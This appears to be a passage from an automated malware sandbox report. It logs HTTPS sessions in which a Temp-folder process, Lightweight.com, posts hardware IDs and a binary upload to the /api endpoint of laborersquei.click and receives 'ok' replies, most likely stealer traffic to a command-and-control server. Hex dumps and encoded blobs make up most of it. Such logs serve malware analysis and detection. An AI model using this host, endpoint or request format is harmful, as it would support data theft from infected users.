                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CLScZwkAZdfxUpLg0WpOOAu96Xq%2BnjetsQC653E8ARbbuHulZg3FCd2Y6LfdinMi68PP%2FQx16RFZnhtZgaEQ6bv%2B5tsF%2FJlVz6ZlX8wfG4AoCnU38xV%2FoCBI%2Flqtxx%2FDusR%2FA%2Fs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f82c669aba442a6-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1861&min_rtt=1859&rtt_var=701&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=982&delivery_rate=1555673&cwnd=215&unsent_bytes=0&cid=ff5f1091b38e9f46&ts=787&x=0"
                                                                                                                                                                              2024-12-26 17:26:18 UTC230INData Raw: 34 65 61 30 0d 0a 78 39 6f 54 78 5a 63 33 32 42 2f 48 38 69 48 42 6e 43 73 51 74 41 76 72 47 69 47 4f 48 43 6b 63 35 63 48 71 46 6d 6b 59 42 47 4b 38 2b 47 58 6e 72 51 50 30 50 62 53 58 41 2f 76 36 53 6e 7a 48 62 73 63 34 51 4f 6f 2b 45 33 71 45 72 5a 6c 7a 52 54 70 79 44 2b 58 67 64 61 54 37 52 4c 30 7a 35 5a 64 5a 34 36 5a 77 61 35 5a 75 68 54 67 62 72 48 6c 44 66 6f 53 74 69 48 63 43 64 33 51 4f 70 4c 4a 2f 6f 76 39 53 75 33 75 6d 6e 6b 79 6b 2b 55 35 78 33 6d 57 43 64 30 6e 6a 50 67 55 2b 67 4c 76 49 4c 45 74 56 59 52 61 6d 6c 33 4b 32 2f 42 57 6c 4d 37 7a 51 52 4b 2b 2b 45 54 4c 56 62 6f 6c 32 52 2b 70 33 51 58 53 4e 70 59 6c 79 41 32 68 74 42 4b 2b 79 63 61 48 2b 57 4c 4a 76
                                                                                                                                                                              Data Ascii: 4ea0x9oTxZc32B/H8iHBnCsQtAvrGiGOHCkc5cHqFmkYBGK8+GXnrQP0PbSXA/v6SnzHbsc4QOo+E3qErZlzRTpyD+XgdaT7RL0z5ZdZ46Zwa5ZuhTgbrHlDfoStiHcCd3QOpLJ/ov9Su3umnkyk+U5x3mWCd0njPgU+gLvILEtVYRaml3K2/BWlM7zQRK++ETLVbol2R+p3QXSNpYlyA2htBK+ycaH+WLJv
                                                                                                                                                                              2024-12-26 17:26:18 UTC1369INData Raw: 71 35 52 4c 72 2f 39 45 63 5a 59 6e 79 58 39 62 72 43 59 4c 4c 62 57 67 6d 57 55 65 64 33 59 47 35 61 63 2f 76 72 56 53 74 6a 33 39 30 45 75 76 38 45 78 78 32 57 36 49 65 46 48 6a 66 6b 68 32 6a 36 65 43 65 77 52 31 61 41 71 69 73 48 69 67 2b 6c 4b 79 65 36 71 54 41 2b 32 2b 54 6d 71 57 4d 63 6c 59 55 2b 39 39 58 33 4f 57 34 35 63 36 45 6a 70 68 44 4f 58 67 4d 61 48 37 56 4c 64 39 74 35 68 49 71 50 74 62 65 64 39 6b 68 48 68 4f 35 6e 46 49 66 6f 43 70 67 6e 73 42 66 6d 73 4e 6f 37 68 78 35 37 73 56 76 57 58 6c 79 41 4f 41 2b 31 6c 31 32 6e 2f 4c 51 67 50 7a 4d 46 49 2b 67 4b 2f 49 4c 45 74 79 59 77 4f 6d 73 33 36 6b 2f 56 36 6f 66 62 65 57 54 71 62 73 54 33 66 59 59 34 70 71 53 65 4a 34 53 48 65 4d 71 6f 31 7a 44 7a 6f 6f 51 4b 4b 67 4d 66 2b 31 64 4c 64
                                                                                                                                                                              Data Ascii: q5RLr/9EcZYnyX9brCYLLbWgmWUed3YG5ac/vrVStj390Euv8Exx2W6IeFHjfkh2j6eCewR1aAqisHig+lKye6qTA+2+TmqWMclYU+99X3OW45c6EjphDOXgMaH7VLd9t5hIqPtbed9khHhO5nFIfoCpgnsBfmsNo7hx57sVvWXlyAOA+1l12n/LQgPzMFI+gK/ILEtyYwOms36k/V6ofbeWTqbsT3fYY4pqSeJ4SHeMqo1zDzooQKKgMf+1dLd
                                                                                                                                                                              2024-12-26 17:26:18 UTC1369INData Raw: 4b 66 2f 51 32 44 45 61 59 56 71 54 2b 5a 34 52 48 4f 4c 34 38 59 30 44 47 49 6d 57 4f 57 53 63 72 50 32 58 2f 68 49 70 70 35 4e 70 4f 67 4a 62 5a 68 77 79 58 39 50 72 43 59 4c 63 34 61 72 6a 6d 59 45 64 32 55 4f 71 37 64 30 71 50 31 56 75 6e 43 67 6c 45 69 6f 2f 55 52 32 78 47 4f 4a 63 45 62 74 64 45 45 2b 79 65 4f 50 62 45 73 69 4a 6a 47 79 73 7a 4f 53 39 6c 75 30 65 72 50 51 58 4f 33 6e 43 58 58 61 4b 64 45 34 54 75 52 37 54 6e 47 47 71 59 5a 78 41 58 5a 75 44 71 61 71 66 71 50 31 57 62 4a 33 71 4a 35 48 71 2f 64 43 65 64 42 70 69 48 49 44 6f 6a 35 4d 5a 73 66 37 79 45 41 4d 64 6d 73 50 35 34 31 79 71 66 74 53 72 44 32 36 33 6c 72 6a 2b 55 55 79 6a 69 6d 46 63 55 50 6e 64 45 39 2b 67 4b 36 4e 64 77 78 35 61 77 65 76 74 6e 61 6a 2b 56 79 33 65 36 57 58
                                                                                                                                                                              Data Ascii: Kf/Q2DEaYVqT+Z4RHOL48Y0DGImWOWScrP2X/hIpp5NpOgJbZhwyX9PrCYLc4arjmYEd2UOq7d0qP1VunCglEio/UR2xGOJcEbtdEE+yeOPbEsiJjGyszOS9lu0erPQXO3nCXXaKdE4TuR7TnGGqYZxAXZuDqaqfqP1WbJ3qJ5Hq/dCedBpiHIDoj5MZsf7yEAMdmsP541yqftSrD263lrj+UUyjimFcUPndE9+gK6Ndwx5awevtnaj+Vy3e6WX
                                                                                                                                                                              2024-12-26 17:26:18 UTC1369INData Raw: 45 79 6a 69 6d 43 54 55 33 36 50 6c 51 77 6e 75 4f 50 65 45 73 69 4a 67 6d 73 71 6e 2b 70 2f 46 69 38 64 61 4b 65 54 71 6a 34 51 6e 58 52 62 34 52 77 54 75 6c 39 53 6e 71 4e 73 59 74 2f 41 58 64 73 51 4f 76 34 64 72 2b 31 44 66 70 61 71 62 6c 54 75 4f 78 66 4d 73 6b 6e 6b 44 68 45 34 44 34 54 50 6f 53 73 67 58 73 44 63 6d 6b 50 6f 62 5a 33 6f 66 68 51 74 58 65 33 6d 45 32 75 39 55 5a 35 78 47 6d 45 66 45 2f 6f 64 6b 42 30 78 2b 33 49 63 78 4d 36 50 6b 43 51 74 58 36 6e 39 6b 50 36 59 75 75 4a 41 36 54 79 43 53 71 57 5a 59 64 34 54 4f 42 79 51 48 61 47 72 34 5a 7a 44 6e 4e 75 43 4c 65 35 64 61 2f 30 57 37 56 38 6f 5a 56 47 70 2f 6c 4e 64 4e 6b 70 78 7a 68 45 39 44 34 54 50 71 69 45 76 54 59 71 51 43 59 66 36 36 45 78 6f 50 6b 56 34 6a 32 70 6b 30 2b 72 38
                                                                                                                                                                              Data Ascii: EyjimCTU36PlQwnuOPeEsiJgmsqn+p/Fi8daKeTqj4QnXRb4RwTul9SnqNsYt/AXdsQOv4dr+1DfpaqblTuOxfMsknkDhE4D4TPoSsgXsDcmkPobZ3ofhQtXe3mE2u9UZ5xGmEfE/odkB0x+3IcxM6PkCQtX6n9kP6YuuJA6TyCSqWZYd4TOByQHaGr4ZzDnNuCLe5da/0W7V8oZVGp/lNdNkpxzhE9D4TPqiEvTYqQCYf66ExoPkV4j2pk0+r8
                                                                                                                                                                              2024-12-26 17:26:18 UTC1369INData Raw: 6c 79 53 41 44 35 6e 56 50 66 59 4f 6d 68 33 55 4b 66 48 51 48 72 4b 70 2f 71 76 70 64 73 6e 53 6b 6c 45 61 75 2b 45 56 34 31 32 36 48 64 6b 75 73 4d 41 74 35 6e 2b 50 51 4e 43 70 71 66 52 4b 7a 74 56 43 71 2b 68 57 6c 4d 37 7a 51 52 4b 2b 2b 45 54 4c 66 65 34 31 31 55 65 56 35 52 58 47 45 73 59 6c 35 41 47 68 68 44 36 47 2f 66 61 48 36 55 37 74 34 72 35 78 45 70 76 56 47 66 70 59 6e 79 58 39 62 72 43 59 4c 55 49 79 77 6e 33 63 46 63 58 41 62 35 61 63 2f 76 72 56 53 74 6a 33 39 30 45 43 6f 39 55 31 79 32 6d 6d 4e 64 55 50 2b 63 55 78 35 6a 71 69 61 66 67 78 39 62 51 69 75 74 33 65 31 2b 56 75 6f 65 4c 65 43 41 2b 32 2b 54 6d 71 57 4d 63 6c 4f 52 50 78 75 53 44 79 32 74 59 74 69 41 48 64 71 51 4c 72 32 61 4f 66 79 57 66 6f 6c 35 5a 5a 4d 71 76 31 47 63 39
                                                                                                                                                                              Data Ascii: lySAD5nVPfYOmh3UKfHQHrKp/qvpdsnSklEau+EV4126HdkusMAt5n+PQNCpqfRKztVCq+hWlM7zQRK++ETLfe411UeV5RXGEsYl5AGhhD6G/faH6U7t4r5xEpvVGfpYnyX9brCYLUIywn3cFcXAb5ac/vrVStj390ECo9U1y2mmNdUP+cUx5jqiafgx9bQiut3e1+VuoeLeCA+2+TmqWMclORPxuSDy2tYtiAHdqQLr2aOfyWfol5ZZMqv1Gc9
                                                                                                                                                                              2024-12-26 17:26:18 UTC1369INData Raw: 57 36 77 6d 43 30 61 4d 72 62 70 33 45 44 70 35 54 72 7a 34 64 71 75 31 44 66 70 2b 6f 70 4e 43 71 66 64 46 66 64 46 74 6d 33 4a 45 2f 6e 39 4b 64 59 71 76 69 48 6b 47 63 47 63 4a 71 4c 52 38 6f 50 4a 61 76 7a 33 72 30 45 53 37 76 68 45 79 39 32 53 43 64 42 69 32 50 6c 51 77 6e 75 4f 50 65 45 73 69 4a 67 43 76 76 58 75 71 39 6c 71 35 62 36 53 57 55 61 50 7a 51 32 44 63 59 6f 78 31 54 75 46 39 54 58 69 4d 72 35 70 39 43 33 6c 74 51 4f 76 34 64 72 2b 31 44 66 70 65 73 6f 5a 4a 70 50 4a 66 65 64 64 71 6e 33 56 54 72 44 41 4c 62 34 43 79 79 43 77 64 61 6e 45 48 75 76 5a 6f 35 2f 4a 5a 2b 69 58 6c 6c 6b 71 6c 2b 55 39 38 78 47 79 50 64 30 7a 6c 64 30 39 32 68 4b 4f 4d 63 41 78 2f 5a 51 79 75 76 33 4b 6f 38 56 79 30 64 4b 72 51 44 65 50 35 55 54 4b 4f 4b 61 68
                                                                                                                                                                              Data Ascii: W6wmC0aMrbp3EDp5Trz4dqu1Dfp+opNCqfdFfdFtm3JE/n9KdYqviHkGcGcJqLR8oPJavz3r0ES7vhEy92SCdBi2PlQwnuOPeEsiJgCvvXuq9lq5b6SWUaPzQ2DcYox1TuF9TXiMr5p9C3ltQOv4dr+1DfpesoZJpPJfeddqn3VTrDALb4CyyCwdanEHuvZo5/JZ+iXllkql+U98xGyPd0zld092hKOMcAx/ZQyuv3Ko8Vy0dKrQDeP5UTKOKah
                                                                                                                                                                              2024-12-26 17:26:18 UTC1369INData Raw: 45 5a 2f 6c 61 43 42 4e 45 55 36 59 52 6a 6c 34 44 47 48 2f 6b 4f 2f 65 72 50 53 64 71 44 77 52 33 58 41 4b 5a 5a 48 44 61 78 2f 43 79 61 2b 75 73 68 69 53 79 49 30 54 75 57 71 4d 66 2b 31 45 72 6c 76 74 35 5a 41 74 66 30 4f 54 4f 68 4f 6e 33 4a 45 2f 48 6c 63 63 63 66 74 79 48 74 4c 49 6c 39 41 72 4c 39 71 74 75 4e 59 71 6e 72 6c 72 77 33 6a 35 67 6b 71 6c 6c 79 4b 64 6b 33 72 61 46 6f 7a 6f 4c 57 43 63 78 74 39 63 51 2f 6c 39 6a 47 68 74 51 33 70 4d 2b 57 55 55 75 4f 6d 47 53 43 4e 50 4e 6f 76 45 37 35 68 42 57 66 48 74 63 67 73 57 54 51 6d 45 75 58 67 4d 65 44 32 52 36 68 37 70 6f 5a 41 35 4d 42 33 56 63 78 6b 6a 32 39 53 30 6b 42 4d 5a 49 71 6c 6e 32 56 48 62 32 55 4f 71 37 39 6e 35 37 73 56 74 54 33 39 71 51 50 72 76 6e 59 38 6c 6e 48 4a 49 41 50 5a
                                                                                                                                                                              Data Ascii: EZ/laCBNEU6YRjl4DGH/kO/erPSdqDwR3XAKZZHDax/Cya+ushiSyI0TuWqMf+1Erlvt5ZAtf0OTOhOn3JE/HlcccftyHtLIl9ArL9qtuNYqnrlrw3j5gkqllyKdk3raFozoLWCcxt9cQ/l9jGhtQ3pM+WUUuOmGSCNPNovE75hBWfHtcgsWTQmEuXgMeD2R6h7poZA5MB3Vcxkj29S0kBMZIqln2VHb2UOq79n57sVtT39qQPrvnY8lnHJIAPZ
                                                                                                                                                                              2024-12-26 17:26:18 UTC1369INData Raw: 6a 74 6b 54 51 64 4f 6a 35 53 36 2f 68 6a 35 36 30 56 2f 58 36 33 67 6b 57 67 36 45 6f 31 36 46 65 75 64 6b 54 74 61 46 74 70 69 4a 32 32 59 51 68 30 61 41 65 7a 71 54 48 70 74 56 72 36 4a 5a 7a 51 43 2b 50 42 42 7a 4c 4f 4b 64 45 34 64 75 39 77 52 58 6d 52 73 73 56 54 42 58 31 6e 46 72 57 76 66 75 65 37 46 62 77 39 2f 63 49 4e 34 2f 70 59 4d 6f 34 35 32 79 4d 57 76 79 6b 62 4c 4a 6a 74 6b 54 51 64 4f 6a 35 53 36 2f 68 6a 35 36 30 56 2f 58 36 33 67 6b 57 67 36 45 6f 31 36 46 65 75 64 6b 54 74 61 46 74 70 69 4f 79 6d 51 69 70 45 57 42 57 6d 74 6e 2b 67 34 30 54 36 4d 2b 57 66 41 2f 76 48 43 54 71 57 56 73 63 34 57 36 77 6d 43 30 75 45 72 59 5a 7a 48 57 73 72 4a 36 75 2f 63 4c 48 6c 51 72 55 79 69 36 5a 69 34 37 41 4a 64 4a 59 78 32 7a 59 44 36 47 38 4c 4a
                                                                                                                                                                              Data Ascii: jtkTQdOj5S6/hj560V/X63gkWg6Eo16FeudkTtaFtpiJ22YQh0aAezqTHptVr6JZzQC+PBBzLOKdE4du9wRXmRssVTBX1nFrWvfue7Fbw9/cIN4/pYMo452yMWvykbLJjtkTQdOj5S6/hj560V/X63gkWg6Eo16FeudkTtaFtpiOymQipEWBWmtn+g40T6M+WfA/vHCTqWVsc4W6wmC0uErYZzHWsrJ6u/cLHlQrUyi6Zi47AJdJYx2zYD6G8LJ
                                                                                                                                                                              2024-12-26 17:26:18 UTC1369INData Raw: 46 48 58 6c 6d 44 71 4c 34 50 2b 66 74 46 65 49 39 69 49 4a 45 73 2f 30 4a 50 4a 5a 6c 79 53 41 44 34 57 78 4d 62 6f 54 76 6a 32 34 4d 4f 6e 6c 4f 76 50 68 6e 35 36 30 47 39 44 32 33 30 42 76 6a 75 55 64 2f 31 32 71 48 65 31 48 2b 65 45 68 6f 68 4f 53 32 53 69 5a 6f 59 52 43 6d 2b 6b 43 71 38 55 4f 76 66 72 57 58 66 5a 33 54 57 33 58 47 61 73 74 55 52 4f 46 79 64 55 43 77 73 6f 39 6b 53 56 78 6c 46 71 62 34 50 2b 66 74 46 65 49 39 69 49 4a 45 73 2f 30 4c 58 74 46 6b 68 54 68 63 6f 6d 63 4c 61 4d 66 37 32 7a 70 4c 61 43 5a 59 35 66 39 79 74 65 64 54 75 57 75 6d 31 33 32 64 30 31 74 31 78 6d 72 4c 53 55 37 6f 61 46 35 39 6c 36 53 32 53 69 5a 6f 59 52 43 6d 2b 6c 53 64 74 32 53 73 66 71 57 65 52 4f 4f 77 43 57 71 57 4d 63 6c 56 55 65 74 75 53 44 79 69 6d 63
                                                                                                                                                                              Data Ascii: FHXlmDqL4P+ftFeI9iIJEs/0JPJZlySAD4WxMboTvj24MOnlOvPhn560G9D230BvjuUd/12qHe1H+eEhohOS2SiZoYRCm+kCq8UOvfrWXfZ3TW3XGastUROFydUCwso9kSVxlFqb4P+ftFeI9iIJEs/0LXtFkhThcomcLaMf72zpLaCZY5f9ytedTuWum132d01t1xmrLSU7oaF59l6S2SiZoYRCm+lSdt2SsfqWeROOwCWqWMclVUetuSDyimc


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              2192.168.2.1649710172.67.166.494432920C:\Users\user\AppData\Local\Temp\709182\Lightweight.com
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-26 17:26:20 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=OP2N2ST4JG5L
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 12809
                                                                                                                                                                              Host: laborersquei.click
                                                                                                                                                                              2024-12-26 17:26:20 UTC12809OUTData Raw: 2d 2d 4f 50 32 4e 32 53 54 34 4a 47 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 37 35 42 43 34 30 43 38 37 44 30 35 42 37 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 4f 50 32 4e 32 53 54 34 4a 47 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 50 32 4e 32 53 54 34 4a 47 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 4f 50 32 4e 32 53 54 34 4a 47 35 4c 0d
                                                                                                                                                                              Data Ascii: --OP2N2ST4JG5LContent-Disposition: form-data; name="hwid"F175BC40C87D05B7D0F23BE3BFA4D7B0--OP2N2ST4JG5LContent-Disposition: form-data; name="pid"2--OP2N2ST4JG5LContent-Disposition: form-data; name="lid"jMw1IE--psyche--OP2N2ST4JG5L
                                                                                                                                                                              2024-12-26 17:26:21 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 26 Dec 2024 17:26:20 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=kojser6oi7hngfmhjqcdp29dad; expires=Mon, 21 Apr 2025 11:12:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZKZnsyPLa4qXShwpx7QTkDofRKks10iGmmR%2B9WkzV4ymUTqTrkTPYzGWCqQhaMAJcU2BBKzNuicjxhUUGcfgoYU7%2FyHVTd%2FWC3RlfA5suD33jbgzZCmroaY9q2YuV0%2F7oU3H4sU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f82c6792ef343b5-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2059&min_rtt=2048&rtt_var=791&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13745&delivery_rate=1363848&cwnd=225&unsent_bytes=0&cid=cca0963989c69146&ts=948&x=0"
                                                                                                                                                                              2024-12-26 17:26:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                              2024-12-26 17:26:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              3192.168.2.1649711172.67.166.494432920C:\Users\user\AppData\Local\Temp\709182\Lightweight.com
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-26 17:26:22 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=PW26DGQR6PK3HXL
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 15062
                                                                                                                                                                              Host: laborersquei.click
                                                                                                                                                                              2024-12-26 17:26:22 UTC15062OUTData Raw: 2d 2d 50 57 32 36 44 47 51 52 36 50 4b 33 48 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 37 35 42 43 34 30 43 38 37 44 30 35 42 37 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 50 57 32 36 44 47 51 52 36 50 4b 33 48 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 57 32 36 44 47 51 52 36 50 4b 33 48 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 50 57 32 36
                                                                                                                                                                              Data Ascii: --PW26DGQR6PK3HXLContent-Disposition: form-data; name="hwid"F175BC40C87D05B7D0F23BE3BFA4D7B0--PW26DGQR6PK3HXLContent-Disposition: form-data; name="pid"2--PW26DGQR6PK3HXLContent-Disposition: form-data; name="lid"jMw1IE--psyche--PW26
                                                                                                                                                                              2024-12-26 17:26:23 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 26 Dec 2024 17:26:23 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=bqvm1kdpurdr6mp2mkdthnse83; expires=Mon, 21 Apr 2025 11:13:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uFgjM1%2FoP4KRI7U1n6oHls2UOoZLNBJF74Mj%2Fu4TT8X3repDsujik6FMElC%2BEJ6PeyYYLRPU9yVwo70XqwDsJAB7pDmnMb87847bCDgo15h1eSTkb1%2B9QJlNEjj2dDFJ8tdhP0w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f82c6887fe17281-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1813&rtt_var=684&sent=11&recv=21&lost=0&retrans=0&sent_bytes=2846&recv_bytes=16001&delivery_rate=1596500&cwnd=214&unsent_bytes=0&cid=90acea29bae790ea&ts=919&x=0"
                                                                                                                                                                              2024-12-26 17:26:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                              2024-12-26 17:26:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              4192.168.2.1649712172.67.166.494432920C:\Users\user\AppData\Local\Temp\709182\Lightweight.com
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-26 17:26:25 UTC285OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=J00HHUFWER406WDENMR
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 20429
                                                                                                                                                                              Host: laborersquei.click
                                                                                                                                                                              2024-12-26 17:26:25 UTC15331OUTData Raw: 2d 2d 4a 30 30 48 48 55 46 57 45 52 34 30 36 57 44 45 4e 4d 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 37 35 42 43 34 30 43 38 37 44 30 35 42 37 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 4a 30 30 48 48 55 46 57 45 52 34 30 36 57 44 45 4e 4d 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4a 30 30 48 48 55 46 57 45 52 34 30 36 57 44 45 4e 4d 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73
                                                                                                                                                                              Data Ascii: --J00HHUFWER406WDENMRContent-Disposition: form-data; name="hwid"F175BC40C87D05B7D0F23BE3BFA4D7B0--J00HHUFWER406WDENMRContent-Disposition: form-data; name="pid"3--J00HHUFWER406WDENMRContent-Disposition: form-data; name="lid"jMw1IE--ps
                                                                                                                                                                              2024-12-26 17:26:25 UTC5098OUTData Raw: 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 60 14 2c 6c fa 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii: (X&7~`aO`,li`M?lrQMn 64
                                                                                                                                                                              2024-12-26 17:26:26 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 26 Dec 2024 17:26:25 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
